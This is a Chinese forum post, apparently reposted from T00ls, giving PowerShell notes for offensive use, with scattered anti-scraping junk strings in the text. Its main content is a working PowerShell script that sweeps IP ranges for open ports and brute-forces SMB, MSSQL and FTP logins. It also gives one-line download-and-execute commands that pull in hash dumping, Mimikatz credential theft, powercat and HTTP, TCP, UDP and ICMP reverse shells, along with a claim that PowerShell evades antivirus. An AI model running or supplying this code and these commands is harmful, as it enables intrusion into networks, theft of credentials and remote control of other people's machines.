1.前言
账号又要 被限号了 = = 之前写的文章。发到这里吧
最近powershell 很火,于是就天天去膜拜dm_的blog。学了一些powershell的基础知识,记下这篇笔记T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security+ g$ m2 @/ _- T7 s1 L
powershell 功能异常强大,需要.NET 2.0以上环境,不要第三方支持,白名单,轻松过杀软。 - 低调求发展7 o7 G! _, b L8 o
在win7/server 2008以后,powershell已被集成在系统当中T00LS6 w+ E* m. j% z8 ?+ O! T U
============================================ - 低调求发展9 {9 K* s5 N6 r' T
2.基础语法
有点和php一样呢。直接百度一个网站开始学习。。。www.t00ls.net2 e9 y* k5 A1 Q8 L' c
http://www.pstips.net/powershell-online-tutorials/www.t00ls.net5 h% @/ ?, E: K; m4 ^0 ]! _( @# f
非常简单的学习了一些,来一个脑图:
T00LS3 O9 x9 b( R1 |9 @ S2 j2 V另外需要说明的是如何加载ps脚本的问题:T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security K ?) v h; h+ J& D+ K1 B* r
方法1:powershell IEX (New-Object Net.WebClient).DownloadString('https://raxxxxx/xxx.ps1');
方法2: set-ExecutionPolicy RemoteSignedT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security! ~ j2 b! M+ a9 ^3 n
Import-Module .xxxxx.ps1 [导入模块] - 低调求发展: J8 a1 {4 I+ f* G% Q0 H
================================
T00LS3 g2 f7 Y9 ( {, g
3.实例代码
学了不用等于白学,招了一个github 源码[https://github.com/samratashok/nishang/tree/master/Scan],
抄抄改改,写出一个端口扫描,并且支持ftp,smb和mssql爆破ps1脚本T00LS# q# f' t7 p/ I0 i
代码:
function Port-Scan { [CmdletBinding()] Param( [parameter(Mandatory = $true, Position = 0)] [ValidatePattern("bd{1,3}.d{1,3}.d{1,3}.d{1,3}b")] [string] $StartAddress, [parameter(Mandatory = $true, Position = 1)] [ValidatePattern("bd{1,3}.d{1,3}.d{1,3}.d{1,3}b")] [string] $EndAddress, [string] $file, [int[]] $Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901), [int] $TimeOut = 100 ) Begin { $ping = New-Object System.Net.Networkinformation.Ping } Process { #init Brute force SQL Server function $Connection = New-Object System.Data.SQLClient.SQLConnection $result=@() foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) { foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) { foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) { foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) { $ip="$a.$b.$c.$d" $pingStatus = $ping.Send($ip,$TimeOut) $openport=@() if($pingStatus.Status -eq "Success") { write-host "$ip is alive" -ForegroundColor red for($i = 1; $i -le $ports.Count;$i++) { $port = $Ports[($i-1)] $client = New-Object System.Net.Sockets.TcpClient $beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null) Start-Sleep -Milli $TimeOut if($client.Connected) { $openport += $port write-host "$ip open $port" -ForegroundColor red "$ip open $port" | out-file -Append -filepath $file } $client.Close() } $iphash=@{ip=$ip;ports=$openport} $result +=$iphash } } } } } foreach ($i in $result){ foreach ($port in $i.ports){ #brute smb $ip=$i.ip if($port -eq 445){ Write-host "Brute Forcing smb Service on $ip...." -ForegroundColor Yellow $conf=Get-Content 'confsmb.conf' foreach ($j in $conf){ $username=$j.Split(":")[0] $password=$j.Split(":")[1] if (wmic /user:$username /password:$password /node:$ip process call create "") { Write-Host "login smb to $ip with $username : $password is successful" -ForegroundColor green "login smb to $ip with $username : $password is successful" | out-file -Append -filepath $file break }else{ Write-Host "login smb to $ip with $username : $password is fail" } } } #brute mssql if($port -eq 1433){ Write-host "Brute Forcing SQL Service on $ip...." -ForegroundColor Yellow $conf=Get-Content 'confmssql.conf' foreach ($j in $conf){ $username=$j.Split(":")[0] $password=$j.Split(":")[1] $Connection.ConnectionString = "Data Source=$ip;Initial Catalog=Master;User Id=$username;Password=$password;" Try { $Connection.Open() $success = $true } Catch { $success = $false Write-host "login mssql to $ip with $username : $password fail " } if($success -eq $true) { Write-host "login mssql to $ip with $username : $Password is successful" -ForegroundColor green "login mssql to $ip with $username : $Password is successful"| out-file -Append -filepath $file Break } } } if($port -eq 21){ Write-host "Brute Forcing ftp Service on $ip...." -ForegroundColor Yellow $source = "ftp://" + $ip $conf=Get-Content 'confftp.conf' foreach ($j in $conf){ Try { $username=$j.Split(":")[0] $password=$j.Split(":")[1] $ftpRequest = [System.Net.FtpWebRequest]::Create($source) $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails $ftpRequest.Credentials = new-object System.Net.NetworkCredential($username, $password) $result = $ftpRequest.GetResponse() $message = $result.BannerMessage + $result.WelcomeMessage Write-host "login ftp to $ip with $username : $password is successful" -ForegroundColor green "login ftp to $ip with $username : $password is successful"| out-file -Append -filepath $file break } Catch { Write-host "login ftp to $ip with $username : $password fail " } } } } } Write-host "put all into $file" -ForegroundColor red } End { } }
效果:T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security& @& v' U' ]# u" P9 a/ j
bug:T00LS% N0 M6 y* y( j
1.代码是单线程的速度一定慢,不知道powershell要怎么去分配线程池
2.smb直接使用了wmic命令,当密码不对时候会显示一个错误,不知道如何去屏蔽不显示
代码没有没有进行服务指纹识别什么的,还是非常粗糙的 但是毕竟只是练手罢了
================================T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security0 {2 w# r: A' W* X4 W( O
4.一些很屌的powershell工具
4.1.获取hashT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security9 o: P, T9 j7 ]9 Q
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHasheswww.t00ls.net" e# ]$ |- ~" S2 P9 ?. {4 |) S4 |) G& q
4.2.获取明文---Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
www.t00ls.net c7 o3 / o7 A: W Y' w
4.3 nc---powercat
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
4.4----各种反弹shell
http: - 低调求发展8 k* `: x* s! d& Q9 a5 a
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PoshRatHttps.ps1')
tcp: - 低调求发展: M& f9 Z" _1 @; w* p- q$ g; X
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')" w# o3 S# b$ x, @7 t* S
udp:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1')3 g8 N& X1 {/ S3 |, D
icmp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1') G! F6 g3 J5 ]$ k
来源:
https://github.com/samratashok/nishang
================================
5.结尾
资料来源:T00LS. f9 ( ! Z/ ~; G3 K0 h8 }
https://github.com/samratashok/nishang/
http://x0day.me/1 P8 C2 l6 p' Q: |, x+ i
http://zone.wooyun.org/content/20429
原文链接:https://www.t00ls.net/thread-30522-1-1.html
本文始发于微信公众号(T00ls):powershell学习笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论